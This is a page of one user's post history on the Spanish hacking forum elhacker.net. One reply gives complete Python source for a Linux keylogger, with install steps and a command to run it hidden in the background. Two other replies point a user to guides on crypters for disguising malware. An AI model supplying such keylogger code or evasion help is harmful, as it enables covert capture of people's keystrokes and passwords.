elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ... 123
81  Foros Generales / Dudas Generales / Re: [Pregunta]: Copiar enlace de texto plano parcialmente oculto con puntos suspensivos en: 21 Marzo 2022, 16:29 pm
Pues no se me ocurre mucho más, a mi por lo menos. A ver si viene alguien y nos ilumina.  :rolleyes:

Otra opción es mirar en el código fuente de la página.



82  Foros Generales / Dudas Generales / Re: [Pregunta]: Copiar enlace de texto plano parcialmente oculto con puntos suspensivos en: 21 Marzo 2022, 16:16 pm
¿Te deja marcarlo? ¿Quizás marcándolo y pulsando Ctrl+c?
83  Seguridad Informática / Análisis y Diseño de Malware / Re: NO ENTIENDO! en: 21 Marzo 2022, 07:36 am
El keylogger en Linux es un script en python. Creas el script lo ejecutas y listo  :P

Código
  1. # import needed modules
  2. import os
  3. from datetime import datetime
  4. import pyxhook
  5.  
  6. def main():
  7.    # Specify the name of the file (can be changed )
  8.    log_file = f'{os.getcwd()}/{datetime.now().strftime("%d-%m-%Y|%H:%M")}.log'
  9.  
  10.    # The logging function with {event parm}
  11.    def OnKeyPress(event):
  12.  
  13.        with open(log_file, "a") as f:  # Open a file as f with Append (a) mode
  14.            if event.Key == 'P_Enter' :
  15.                f.write('\n')
  16.            else:
  17.                f.write(f"{chr(event.Ascii)}")  # Write to the file and convert ascii to readable characters
  18.  
  19.    # Create a hook manager object
  20.    new_hook = pyxhook.HookManager()
  21.    new_hook.KeyDown = OnKeyPress
  22.  
  23.    new_hook.HookKeyboard()  # set the hook
  24.  
  25.    try:
  26.        new_hook.start()  # start the hook
  27.    except KeyboardInterrupt:
  28.        # User cancelled from command line so close the listener
  29.        new_hook.cancel()
  30.        pass
  31.    except Exception as ex:
  32.        # Write exceptions to the log file, for analysis later.
  33.        msg = f"Error while catching events:\n  {ex}"
  34.        pyxhook.print_err(msg)
  35.        with open(log_file, "a") as f:
  36.            f.write(f"\n{msg}")
  37.  
  38.  
  39. if __name__ == "__main__":
  40.    main()


Código:
The following instructions will install Keylogger using pip3 .

  pip3 install -r requirements.txt

or

  pip3 install pyxhook

Código:
How to run it

By running nohup python3 keylogger.py & command, it'll start to log your strokes: The meaning of nohup is ‘no hangup‘. When nohup command use with ‘&’ then it doesn’t return to shell command prompt after running the command in the background.

$~/Keylogger/linux$ nohup python3 keylogger.py &
[1] 12529 //this is the keylogger's PID (process ID)
$:~/Keylogger/linux$ fg

The Keylogger is now running! It will log your strokes to a file . Stop it by typing the command fg then hitting CTRL+C

or

kill {PID} for example kill 12529
84  Programación / .NET (C#, VB.NET, ASP) / Re: Como extraer un recurso embebido a mi proyecto C# en: 20 Marzo 2022, 08:21 am
Buenas!

No manejo .NET pero bueno, voy a intentar echarte una mano.

¿Para qué necesitas guardar una DLL en un recurso? ¿No es más fácil dejarla fuera en la misma ubicación de tu ejecutable?

Bueno, sea cual sea la respuesta, aquí te dejo la documentación que aporta Microsoft para el manejo de recursos en .NET:

https://docs.microsoft.com/en-us/dotnet/core/extensions/resources

Y si quieres hacerlo usando las API nativas de Windows puedes empezar mirando por aquí:

https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-findresourcea

Espero haberte ayudado.
85  Seguridad Informática / Hacking / Re: como crear un crypter para enviar un server en: 16 Marzo 2022, 16:55 pm
Aquí te dejo un poco de info.

https://foro.elhacker.net/buscador-t449515.0.html
https://foro.elhacker.net/buscador-t447045.0.html


Tienes más en el buscador del foro.
86  Foros Generales / Foro Libre / Re: dudas conductor calor en: 16 Marzo 2022, 07:46 am
Esa sí es una buena pregunta, cuya respuesta sería difícil hallar en Google. Yo creo que respondo por aburrimiento, porque la novela que estoy leyendo está lenta, el programa que estoy haciendo está difícil, y ayer jugué un videojuego y no quiero jugar todos los días... y quizá algo más. Pero por otro lado, también quejarse es porque uno busca cierta "calidad" en el foro. Tal vez es una exigencia tonta, pero bueno...

¿Buscas calidad en foro libre?   :xD
87  Foros Generales / Foro Libre / Re: dudas conductor calor en: 16 Marzo 2022, 07:30 am
Y yo me pregunto, si tanto os molesta lo que postean determinados usuarios.... ¿Por qué continuais respondiendoles?.... No lo entiendo -vive y deja vivir-.

Es solo una opinión.

Saludos.
88  Seguridad Informática / Hacking / Re: como crear un crypter para enviar un server en: 16 Marzo 2022, 07:24 am
https://foro.elhacker.net/analisis_y_diseno_de_malware/taller_asi_funcionan_los_crypters_cifrando_malware_a_mano-t262806.0.html
89  Programación / .NET (C#, VB.NET, ASP) / Re: cheat en vb.net con controles en: 7 Marzo 2022, 22:04 pm
Si quieres detectar la pulsación de una tecla lo puedes hacer con GetAsyncKeyState.

https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate

90  Seguridad Informática / Hacking / Re: me escribe gente random en instagram que saben mi nombre he apellidos en: 7 Marzo 2022, 16:16 pm
La única solución si te están acosando por internet es ir a denunciar a la policía y verás como se les quita la risa.


Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ... 123
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines